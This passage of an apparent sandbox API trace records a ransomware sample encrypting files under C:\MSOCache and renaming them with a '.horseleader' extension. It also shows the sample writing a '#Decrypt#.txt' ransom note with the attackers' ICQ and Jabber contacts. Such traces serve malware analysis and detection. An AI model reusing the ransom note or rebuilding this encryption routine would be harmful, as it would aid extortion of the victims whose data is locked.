Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0219.544] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.544] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.544] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.545] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0219.545] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0219.545] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=31094) returned 1 [0219.545] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.547] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.548] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.548] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x2976, lpOverlapped=0x0) returned 1 [0219.549] SetFilePointerEx 
(in: hFile=0x21c, liDistanceToMove=0xffffd68a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.549] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x2976, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x2976, lpOverlapped=0x0) returned 1 [0219.549] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.549] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.549] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.549] CloseHandle (hObject=0x21c) returned 1 [0219.550] GetProcessHeap () returned 0x780000 [0219.550] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.550] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0219.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0219.550] GetProcessHeap () returned 0x780000 [0219.551] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.551] 
FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x18177c50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x7976, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0219.551] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0219.551] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0219.551] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0219.552] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0219.552] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0219.553] lstrlenA (lpString="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") returned 1368 [0219.553] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0219.553] CloseHandle (hObject=0x1cc) returned 1 [0219.553] GetProcessHeap () returned 0x780000 [0219.554] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0219.554] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0219.554] lstrcmpiW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0219.554] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C") returned 66 [0219.554] lstrcmpW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0219.554] lstrcmpW (lpString1="{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0219.554] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0219.554] GetProcessHeap () returned 0x780000 [0219.554] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0219.554] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*") returned 68 [0219.554] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0219.556] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0219.556] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\.") returned 68 [0219.556] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0219.557] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0219.557] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0219.557] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0219.557] lstrlenW (lpString=".testttjffg") returned 11 [0219.557] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0219.557] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.557] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0219.557] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0219.557] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0219.557] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0219.557] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\..") returned 69 [0219.557] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0219.557] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0219.557] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0219.557] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0219.558] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0219.558] lstrlenW (lpString=".testttjffg") returned 11 [0219.558] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0219.558] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.558] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.558] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0219.558] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0219.558] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0219.558] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0219.558] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".horseleader") returned 0x0 [0219.558] lstrcmpW (lpString1="Office32WW.msi", lpString2="#Decrypt#.txt") returned 1 [0219.558] lstrcmpW (lpString1="Office32WW.msi", lpString2="_uninstalling_.png") returned 1 [0219.558] lstrlenW (lpString=".testttjffg") returned 11 [0219.558] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpSrch=".testttjffg") returned 0x0 [0219.558] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.558] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 
[0219.559] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.560] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0219.560] StrStrW (lpFirst="Office32WW.msi", lpSrch=".txt") returned 0x0 [0219.560] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1992192) returned 1 [0219.560] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.560] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.563] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.564] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.564] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf0b00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.564] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.578] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | 
out: lpNewFilePointer=0xffffffff) returned 1 [0219.578] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.578] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1e1600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.578] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.586] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.586] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.586] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.586] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.587] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.587] CloseHandle (hObject=0x21c) returned 1 [0219.587] GetProcessHeap () returned 0x780000 [0219.587] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.587] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.horseleader") returned 93 [0219.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.horseleader")) returned 1 [0219.588] GetProcessHeap () returned 0x780000 [0219.588] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.588] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87abdaa0, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87abdaa0, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5cd2aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0219.588] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0219.589] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0219.589] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".horseleader") returned 0x0 [0219.589] lstrcmpW (lpString1="Office32WW.xml", lpString2="#Decrypt#.txt") returned 1 [0219.589] lstrcmpW (lpString1="Office32WW.xml", lpString2="_uninstalling_.png") returned 1 [0219.589] lstrlenW (lpString=".testttjffg") returned 11 [0219.589] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpSrch=".testttjffg") 
returned 0x0 [0219.589] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.589] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.589] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.590] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0219.590] StrStrW (lpFirst="Office32WW.xml", lpSrch=".txt") returned 0x0 [0219.590] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=4274) returned 1 [0219.590] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x10b2, lpOverlapped=0x0) returned 1 [0219.628] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.628] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x10b2, lpOverlapped=0x0) returned 1 [0219.628] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.628] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, 
lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.628] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.628] CloseHandle (hObject=0x21c) returned 1 [0219.628] GetProcessHeap () returned 0x780000 [0219.629] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.629] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.horseleader") returned 93 [0219.629] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.horseleader")) returned 1 [0219.629] GetProcessHeap () returned 0x780000 [0219.629] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.629] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe57f8e0, ftCreationTime.dwHighDateTime=0x1cbe1cb, ftLastAccessTime.dwLowDateTime=0xfe57f8e0, ftLastAccessTime.dwHighDateTime=0x1cbe1cb, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0219.629] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0219.629] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | 
